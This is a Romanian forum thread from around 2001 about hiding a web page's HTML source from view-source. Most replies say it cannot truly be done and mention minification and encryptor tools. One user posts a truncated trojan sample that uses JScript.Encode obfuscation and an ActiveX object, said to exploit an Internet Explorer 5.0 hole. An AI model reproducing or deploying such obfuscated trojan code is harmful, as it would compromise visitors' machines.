Cum codez sursa HTML?

[Ethan Hunt]

Cum pot sa criptez sursa html a unei pagini ca atunci cabd se dsa view source sa sa vada numai %^%&^*^&*(*&) ... chestii aiurea.
Parca era un topic asemanator dar nu-l mai gasesc.Poate ma ajutati voi cu un link sau altceva.

[pat]

nu prea ai cum sa codezi sursa HTML ... si daca o faci iti trebuie si un plugin care sa decodeze inainte sa o trimita browserului.


Ideea e ca browserul nu o sa stie niciodata sa iti transforme niste *&$^#$^ in <input> fara acel plugin ..

ce poti sa faci e sa elimini spatiile dintre taguri (rand nou si spatiu) astfel incat html-ul sa devina o insiruire de taguri ... in care nu mai sta nimeni sa isi dea seama unde se deschide si se inchide body.

[Mad Dog on the Street]

adica nu ai de ce sa ascunzi sursa ... oricat de inteligent ar fi codul HTML scris de tine fii sigur ca a fost deja scris de altul
orice functie importanta de natura a dezvalui informatzii aiurea se ruleaza de pe server... si orice minunatzii de script deasemenea se harcodeaza la server...

[pat]

probabil ii e frica sa nu ii fure cineva minunatia de jscript care a inventat-o ...

[glipy]

^

[POWER]

Uite un exemplu de troian care foloseste functia o functie de codificare din JScript:

[code]
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title></title>
<script language = JScript.Encode>#@~^SAAAAA==@#@&0;
mDkW Pk3Dv#`/VW 1VWkn`*iDO;D
PDD;+IN@#@&Ak [WSRGUDDG.
{/3Dp@#@&4hYAAA==^#~@</script>
</head>
<body>

<object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC" ></object>
<script language = JScript.Encode>#@~^7hMAAA==@#@&@#@&6E mYbW
~3\rxv#`@#@&PP7CD,+6a[CYP
{PU+A~GlO+vcxh~9mY+cb*RL+DPb:nv#,_Pv
W~e,vTPCPT,eP8T!ZPe,1T#*i@#@&~PrW,`[W1;:xO
1WWVrRrx9nXrWvJkXJ*~'{PRF*P`@#@&PP,~NKmEsnUYcmK
WVknxrK.kXxoxn.mVi~nXwrDd{J~3P6w9lDnRDW!H:?
O.bxovbP3PJp~2lDt
{zIJI@#@&P~P,~P@#@&d^MRIndYc#p@#@&/^MRhlY4'r/)'-
.+sW-nbYR4Olri@#@&d^DcfKmxJ@!u:HJ@*@!u2zf@*@!:qKJ3@*
(@!z:S3@*@!_Kb=bhKS&Z)K&rH~&f''Et}-J, (1Grq?PbP3
{Hrxbhk.+@*@!JC2)9@*@!$rGe,A!;rdrI{a;/Z;Z/@*'D@!G
(L+1OPbN'EAdtEP1VC/dr9'vm^dk9)o12*f/+yOqZwT FqG! bf~, T!;!
*sG*0)ZAB@*@!zK4L^O@*'x,@!jZ](hK@*- WE
mOrKxPd3M`b kn^0
[....................................................]
</script>
</object>
</body>
</html>
[/code]

Evident ca si la asta exista un workaround, dar, oricum, nu se vede cu ochiul liber.

In concluzie, se poate face ceva simplutz care sa folosesca doar JavaScript (JScript nu e suficient de universal - Damn MS) astfel incat codul sa nu se vaza cu ochiul liber.

[razvi]

ASCII To Hexadecimal Converter
Version 2.0
Our ASCII To Hexadecimal Converter is designed to allow Webmaster to encrypt their JavaScript so general users and webspace providers can not read it. At the moment our software only supports JavaScript yet new versions will be able to handle HTML.
Freeware

http://members.nbci.com/_XMCM/bksoftware/ascii2hex.html

[Mad Dog on the Street]

din mai multe discutzii publice am aflat ca degeaba te chinui sa criptezi HTML ... zo celelalte cai le-am spus

[POWER]

M-ai dat pe spate cu argumentul: "din mai multe discutzii publice am aflat ca degeaba te chinui sa criptezi HTML". Habar nu ai ce se intampla intr-un browser. De exemplu functia de decodare a worm-ului care l-am dat exemplu mai sus e hardcoded in browser. Fiind scrisa de MS, e relativ usor de spart. probabil ca in versiuni mai noi ale browser-ului, se va face o codificare mai tare. Intrebarea omului era "cum pot sa criptez sursa html a unei pagini" asa ca tu n-ai raspuns la nimic. Ideea era sa nu se vada din prima html-ul, dupa cum am si zis in reply-ul anterior.

Intr-adevar, nu se pun in pagina niciodata informatii care trebuie sa ramana secrete. De exemplu, imbecilii de la XNet: In pagina cu "CONTUL MEU" se face logarea. In pagina de dupa logare, exista un link "Schimba parametrii E-mail". In acel link sunt prezente IN CLAR numele utilizatorului si parola. In plus, cu unele versiuni de IE, pagina ramane in cache. Aia sunt complet idioti!

Do your homework next time, or you'll meet Basescu.

[Lao]

HTMLEncryptor 1.2

"HTMLEncryptor enables you to encrypt your Web pages, making their underlying code unreadable to visitors. As a result, your pages are viewable, but the source code for those pages is encrypted and cannot be viewed. You can also choose to encrypt specific sections of HTML pages--useful for pages you intend to submit to search engines. Additional, you can compress HTML pages before encryption now!"

-------------
Mea pulpa...

[Mad Dog on the Street]

Asa mah bun bun tocmai m-am uitat intr-un browser te rog sa te ridici
Aveai dreptate era vb de una pagina oarecare dar io am crezut ca omu vrea sa ascunda lucruri nebanuite intr-un proiect plin de pagini pline de nebanuit ... nestiind de miscarea open source
Ce ie bah un "worm" de fapt ?
Bah io nu stiu ce vorbesc sunt prea prost pentru voi zo sorry

[POWER]

Quote:

A worm is a type of virus or replicative code that situates itself in a computer system in a place where it can do harm. There are viruses (such as Melissa) that don't "worm themselves in" to a place where they can do much harm and simply replicate themselves by e-mail to many computers. Worm.ExploreZip is an example of a worm. Like most computer viruses, worms usually come in Trojan horses.

Ia vezi aici niste descrieri de worms: http://www.avp.ch/avpve/iworms.stm
Cel din post-ul meu e doar troian (asa cum am zis prima data), nu si worm, si foloseste o gaura de securitate din IE 5.0 (dar fix 5.0).

[jumanji999]

Ethan hunt ai reusit sa criptezi sursa html asa cum ai vreu...sunt foarte interesat

[Ethan Hunt]

Quote:

Originally Posted by jumanji999

Ethan hunt ai reusit sa criptezi sursa html asa cum ai vreu...sunt foarte interesat

Salut,

Nici nu mai imi aduc aminte de ce am cerut eu chestia asta sincer sa fiu (e din 2001 ). Poate stie cineva pe aici, de atunci cred ca s-au mai schimbat lucrurile in crearea de pagini html.

[PigBrother]

Nu, nu s-a schimbat nimic.
Un HTML este un fisier text parsat de browser, nu exista module de decriptare pentru asa ceva.